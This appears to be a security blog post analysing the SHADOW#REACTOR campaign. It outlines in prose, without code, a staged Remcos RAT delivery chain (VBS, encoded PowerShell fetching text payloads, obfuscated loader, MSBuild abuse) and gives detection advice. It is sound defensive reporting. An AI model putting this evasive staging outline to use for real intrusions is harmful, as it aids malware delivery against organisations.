SHADOW#REACTOR Campaign Drops Remcos RAT via MSBuild

Securonix researchers have exposed a multi-stage malware campaign dubbed SHADOW#REACTOR that delivers Remcos RAT through an unusually evasive infection chain. The campaign targets enterprise and small-to-medium business environments, with tooling that suggests initial access broker involvement.

What sets this operation apart is its reliance on intermediate text-only stagers and in-memory PowerShell reconstruction—a combination designed to slip past endpoint detection tools that key on binary payloads.

How the Attack Unfolds

The infection begins with an obfuscated Visual Basic Script named "win64.vbs" that likely arrives via phishing or social engineering. When executed through wscript.exe, it deploys a Base64-encoded PowerShell payload.

The PowerShell script then reaches out to attacker infrastructure using System.Net.WebClient, downloading a text-based payload—"qpwoe64.txt" for 64-bit systems or "qpwoe32.txt" for 32-bit—into the %TEMP% directory. The stager validates file existence and size before proceeding, implementing a self-healing mechanism that retries downloads if the file doesn't meet expected thresholds.

Upon validation, a secondary PowerShell script ("jdywa.ps1") is constructed in the temp directory. This script invokes a .NET Reactor-protected assembly that establishes persistence and incorporates anti-debugging and anti-VM checks.

The final stage abuses MSBuild.exe—a legitimate Windows binary—to execute the Remcos RAT payload. This living-off-the-land technique allows the malware to run under a trusted Microsoft process, complicating detection.

Why Text-Based Stagers Matter

Traditional malware drops binary executables that security tools can scan and flag. SHADOW#REACTOR's text-only intermediate payloads are reconstructed in memory, meaning they never touch disk in their final form. This approach mirrors techniques we've seen in supply chain attacks targeting developer tools, where attackers increasingly prefer fileless execution.

The .NET Reactor protection on the loader adds another obstacle—this commercial obfuscation tool is legitimate software, making the protected assembly harder to analyze and flag as malicious.

Attribution and Intent

Securonix assesses this as a broad, opportunistic campaign rather than targeted espionage. The tooling and tradecraft align with typical initial access brokers: threat actors who obtain footholds in target environments and sell that access to ransomware groups or other buyers.

This fits a pattern we've tracked extensively in our ransomware group profiles. Access brokers have become the supply chain feeding ransomware operations, and campaigns like SHADOW#REACTOR represent the upstream collection activity.

Defensive Recommendations

1. Monitor PowerShell activity - Flag Base64-encoded commands and suspicious WebClient downloads to temp directories
2. Watch MSBuild.exe - This binary rarely runs outside development environments; unexpected execution warrants investigation
3. Block or monitor VBS execution - Most enterprises don't need users running .vbs files from email attachments
4. Implement application allowlisting - Prevent unauthorized scripts from executing in user contexts

Organizations should also review their malware defense fundamentals, particularly around fileless attack detection. Traditional antivirus alone won't catch these staged payloads.

Why This Matters

SHADOW#REACTOR demonstrates how commodity malware delivery has evolved. The combination of legitimate tools (MSBuild), commercial obfuscation (.NET Reactor), and text-based staging creates an infection chain that's harder to detect than dropping a PE file.

For security teams already stretched thin, this means yet another detection gap to close—one that requires behavioral monitoring rather than signature-based scanning.